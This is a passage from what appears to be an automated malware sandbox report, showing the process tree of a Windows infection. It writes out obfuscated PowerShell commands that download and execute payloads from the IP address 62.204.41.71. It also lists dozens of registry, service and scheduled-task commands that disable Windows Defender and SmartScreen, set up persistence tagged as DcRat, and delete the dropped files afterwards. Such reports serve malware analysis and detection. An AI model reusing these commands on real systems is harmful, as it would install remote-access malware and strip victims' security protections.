C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\uefifces\7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\ezokegez.exe" C:\Windows\SysWOW64\uefifces\7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create uefifces binPath= "C:\Windows\SysWOW64\uefifces\ezokegez.exe /d\"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe\"" type= own start= auto DisplayName= "wifi support"7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description uefifces "wifi internet conection"7⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start uefifces7⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12607⤵
- Program crash
-
C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe"C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13087⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13167⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13847⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f & erase "C:\Users\Admin\Documents\hO5xKfTb0uXbbkS86n6An9zN.exe" & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "hO5xKfTb0uXbbkS86n6An9zN.exe" /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4148 -s 13607⤵
- Program crash
-
C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe"C:\Users\Admin\Documents\TovKtHieW7V9aCT7Dk2QoIn9.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe"C:\Users\Admin\Documents\GlMzB0cjitEHTuadmoJgQMmB.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pifAccostarmi.exe.pif N9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe"C:\Users\Admin\Documents\AeDLshJf0BYumx9Wg7E57LU8.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 4529⤵
- Program crash
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"8⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive8⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\Users\Admin\AppData\Roaming\OneDrive9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c attrib +s +h C:\ProgramData\OneDrive8⤵
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h C:\ProgramData\OneDrive9⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -exec bypass start-process C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs8⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\Offer.vbs"9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\OneDrive\Offer.bat" "10⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Offer.exeOffer.exe11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 411⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f11⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\System32\smartscreen.exe" /a11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im smartscreen.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable11⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisDrv11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdNisSvc11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdFilter11⤵
-
C:\Windows\SysWOW64\sc.exesc stop WdBoot11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 211⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Roaming\OneDrive\Power.exePower.exe Regedit.exe /S Offer.reg11⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg12⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg13⤵
-
C:\Windows\Regedit.exe"C:\Windows\Regedit.exe" /S Offer.reg14⤵
- Runs .reg file with regedit
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SgrmBroker11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SgrmAgent11⤵
-
C:\Windows\SysWOW64\sc.exesc delete SecurityHealthService11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdBoot11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdFiltrer11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisSvc11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WdNisDrv11⤵
-
C:\Windows\SysWOW64\sc.exesc delete wscsvc11⤵
-
C:\Windows\SysWOW64\sc.exesc delete Sense11⤵
-
C:\Windows\SysWOW64\sc.exesc delete WinDefend11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 211⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -PUAProtection disable"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ScanScheduleDay 8"11⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\Drive.exeDrive.exe11⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"12⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"13⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe13⤵
-
C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe"C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe"14⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe wjzmhxaceqz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7071LQ7krggxA/UnVAaiocMjg0W1H5yAsWgrQR/11zt7RRg3ZnxBodCtMBKiY6+h9La4/jA7nc9BcXwzk8+WkGkxNBMC7OGlDKj9rOiTQ/TOxoHyWdibvyBbcnCZiKPxB8iibCz9eqCXI7CHageLKU6YJPTRFLen1ePs/tUv7hCEAIVa5jfPO/y1Z4uyViDjd5hg2gMd7UuClJ+CBHAOYUVsH8w1ma5UC3dsohG2flQxaKhHOaDpp5ELr7DD/0MGPcTCx4O3hoEDL/m+UtWA6Qj3vGo+MsusQ4bNf46gR3oRP951wrLt7MHk+nkdjBgVoC5qv8B33n5lfVldrIlXKY5U377OV/MbG7Ue/212cYr14⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5788 -s 40815⤵
- Program crash
-
C:\Windows\SysWOW64\timeout.exetimeout /t 411⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe"C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 4327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 4407⤵
- Program crash
-
C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe"C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe"C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 4327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 4527⤵
- Program crash
-
C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe"C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"7⤵
-
C:\Windows\system32\mode.commode 65,108⤵
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e file.zip -p320791618516055 -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_9.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_8.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_7.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_6.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_5.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_4.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_3.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_2.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_1.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\attrib.exeattrib +H "Result_protected.exe"8⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe"Result_protected.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"9⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"10⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\222.exe"C:\Users\Admin\AppData\Local\Temp\222.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 4327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 4527⤵
- Program crash
-
C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"6⤵
-
C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 16287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 20567⤵
- Program crash
-
C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"6⤵
-
C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB515.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCB8B.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
